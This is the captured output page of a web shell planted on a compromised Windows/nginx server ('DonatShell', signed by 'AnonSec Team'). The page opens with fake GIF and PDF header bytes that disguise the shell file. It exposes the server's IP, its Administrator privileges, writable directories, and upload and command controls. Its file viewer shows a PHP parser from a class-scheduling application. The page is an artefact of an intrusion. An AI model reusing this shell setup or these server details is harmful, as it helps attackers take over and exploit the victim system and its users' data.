GIF89a; %PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµù Õ5sLOšuY Donat Was Here
DonatShell
Server IP : 134.29.175.74  /  Your IP : 216.73.216.160
Web Server : nginx/1.10.2
System : Windows NT CST-WEBSERVER 10.0 build 19045 (Windows 10) i586
User : Administrator ( 0)
PHP Version : 7.1.0
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /nginx/html/Scheduler/admin/parse/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : /nginx/html/Scheduler/admin/parse/parse_31.phpinc
<?
// parse_31.phpinc
// Get meeting info.

t_Begin(); // Begin TRACKing include_filename.phpinc.
d_line('Get meeting info.');
d_Line('state: '.$state.' line: '.$line.': '.$classLn); d_Var('$classLnA',$classLnA); // DEBUG class line.

$meetingIndex = count($classInfo['meeting']); // Get $classInfo['meeting'] array index.
#if ( !substr($classLnA[0],1) ) d_Line('ERROR state: '.$state.' line: '.$line.': '.$classLn,'d'); 	d_Var('$classLnA',$classLnA,'d'); // DEBUG class line.

#d_Var('sessionInfo',$sessionInfo);
$debug = false;
/** /
if ($classInfo['departmentCode'] == 'CST' && $classInfo['courseNumber'] == '1022' ) {
	$debug = true;
	d_line($classInfo['departmentCode'].$classInfo['courseNumber'],'d/');
	d_Var('$classLnA',$classLnA,'d+');
}
/**/
//d_line($classInfo['departmentCode'].$classInfo['courseNumber'],$debug.'/');
$classInfo['meeting'][$meetingIndex]['classmeetingStartDate'] = fix_date_year( $classLnA[8],1,$sessionInfo['sessionStart'],$debug);
$classInfo['meeting'][$meetingIndex]['classmeetingEndDate'] = fix_date_year( $classLnA[8],2,$sessionInfo['sessionEnd'],$debug);
$classInfo['meeting'][$meetingIndex]['DAYS'] = $classLnA[9];
if ( $classLnA[10] != 'Arranged' && $classLnA[10] != 'TBA' ) { // Does the class have a begin and end time?
 	// Yes, set the begin and end time.
	$timeParts = explode('-',$classLnA[10]);
	$classInfo['meeting'][$meetingIndex]['classmeetingBeginTime'] = trim($timeParts[0]);
	$classInfo['meeting'][$meetingIndex]['classmeetingEndTime'] = trim($timeParts[1]);
} else { // Does the class have a begin and end time?
	// No, 
	$classInfo['meeting'][$meetingIndex]['classmeetingBeginTime'] = '';
	$classInfo['meeting'][$meetingIndex]['classmeetingEndTime'] = '';
} // Does the class have a begin and end time?
// Get BLDG and ROOM.
if ( $classLnA[11] == 'ON' || $classLnA[12] == 'ONLINE' ) { // Is this online?
	// Yes, set online.
	$classInfo['online'] = true;
	$classInfo['meeting'][$meetingIndex]['CAMPUS'] = '';
	$classInfo['meeting'][$meetingIndex]['BLDG'] = 'ON';
	$classInfo['meeting'][$meetingIndex]['ROOM'] = 'ONLINE';
} else {
	$classInfo['meeting'][$meetingIndex]['CAMPUS'] = $parseFile;
	$classInfo['meeting'][$meetingIndex]['BLDG'] = $classLnA[11];
	$classInfo['meeting'][$meetingIndex]['ROOM'] = $classLnA[12];
}
$classInfo['meeting'][$meetingIndex]['INSTRUCTOR'] = $classLnA[13];

d_Var('$classInfo',$classInfo,'');

set_state(30); // Check for class meeting line.

#set_state(99);
t_End(); // End TRACKing include_filename.phpinc.
?>

Anon7 - 2022
AnonSec Team